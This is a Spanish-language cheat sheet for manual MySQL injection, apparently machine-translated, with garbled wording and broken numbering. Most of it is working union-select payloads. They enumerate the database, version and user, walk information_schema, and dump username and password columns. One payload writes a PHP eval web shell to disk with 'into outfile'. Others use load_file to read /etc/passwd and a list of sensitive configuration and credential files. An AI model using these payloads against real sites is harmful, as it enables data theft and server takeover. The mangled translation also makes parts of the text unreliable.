Seguridad de red, inyección de mysql, como ***.php?id=5 union select 1, 2, 3, 4.
Si vuelve normal
Ordenar por número/*
Coincidir campo
y 1=1 unión seleccione 1, 2, 3, 4, 5.... ...n/*
Posición del campo de tormenta
y 1=2 unión seleccione 1, 2, 3, 4, 5....n/*
Información de la base de datos de Storm usando funciones integradas
Version() Database() User()
No es necesario adivinar los campos disponibles para tormentar la información de la base de datos (no disponible para algunos sitios):
p>y 1=2 unión todos seleccionan versión() /*
y 1=2 unión todos seleccionan base de datos() /*
y 1=2 unión todos seleccionan usuario() /*
Información del sistema operativo:
y 1=2 unión todos seleccionan @@global.version_ compile_os de mysql.user /*
Permisos de base de datos:
y ord(mid(user(), 1, 1))=114 /*Regresar al valor normal de raíz
Biblioteca Storm (mysqlgt; 5.0)
Mysql 5 y superiores tienen una biblioteca incorporada information_schema, que almacena toda la información de la base de datos y la estructura de tablas de mysql
y 1=2 union select 1, 2 , 3, SCHEMA_NAME, 5, 6, 7, 8,9,10 de information_schema.SCHEMATA limit 0,1
Adivina la tabla
y 1=2 union select 1,2 ,3,TABLE_NAME,5,6,7, 8, 9, 10 de information_schema.TABLES donde TABLE_SCHEMA=Límite de base de datos (hexadecimal) 0 (inicio del registro, 0 es el primer registro inicial), 1 (mostrar 1 registro) -
Adivina el campo
y 1=2 Unión selecciona 1, 2, 3, COLUMN_NAME, 5, 6, 7, 8, 9, 10 de information_schema.COLUMNS donde TABLE_NAME= tabla límite de nombre (hexadecimal) 0, 1
contraseña de Storm
y 1=2 selección de unión 1, 2, 3, segmento de nombre de usuario, 5, 6, 7, segmento de contraseña, 8, 9 del límite de nombre de tabla 0, 1
Uso avanzado (un solo campo utilizable muestra dos contenidos de datos)
Selección de unión 1, 2, 3concat (segmento de nombre de usuario, 0x3c, segmento de contraseña ), 5, 6, 7, 8,9 del límite de nombre de tabla 0,1
Escritura directa
Caballo (privilegio de root)
Condiciones: 1. Conocer la ruta física del sitio web
2 Tener permisos suficientes (puede usar select.... de la prueba mysql.user) <. /p>
3. magic_quotes_gpc()=OFF
seleccione 'lt;?php eval($_POST[cmd])?gt;' en el archivo externo 'Ruta física'
y 1=2 unión todos seleccionan Una oración valor HEX en el archivo de salida 'Ruta'
load_file() Rutas comunes:
1. ×3c, 0×20)
2, reemplazar(load_file(char(47,101,116,99,47,112,97,115,115,119,100))
2. reemplazar(load_file(char(60), char (32))
Los dos anteriores son para ver el código exacto que se muestra en el archivo PHP. En algunos casos, no reemplazamos algunos caracteres como "lt;" se reemplazan con "espacio" para regresar. la página web sin ver el código
3. load_file(char(47)) puede enumerar el directorio raíz de los sistemas FreeBSD y Sunos.
p>4. conf tpd.conf o /usr/local/apche/conf tpd.conf. Ver el archivo de configuración del host virtual APACHE de Linux
5.
18. /etc/redhat-release Versión del sistema Redhat
19. C:/mysql\data\mysql\ user.MYD Contraseñas de usuario existentes en el sistema MYSQL
20, /etc/sysconfig/network-scripts/ifcfg-eth0 Ver IP.
21, /usr/local/app/php5 b /php.ini //Configuraciones relacionadas con PHP
22, /usr/local/app/apache2/conf/extra tpd-vhosts.conf //Configuración del sitio web virtual
23, C :\Program Files\RhinoSoft.com\Serv-U \ServUDaemon.ini
24.c:\windows\my.ini
25.c:\boot.ini p>
Archivos de configuración de sitios web de uso común p>
config.inc.php, config.php.
load_file() se reemplaza por (load_file(HEX).char(60), char(32))
Nota:
Char(60) significa lt;
Char(32) representa un espacio
Problemas que ocurren al inyectar manualmente:
La página muestra al inyectar:
Para la operación "UNION", hechizo (latin1_swedish_ci, IMPLICIT) y (utf8_general_ci, IMPLICIT) mezcla ilegal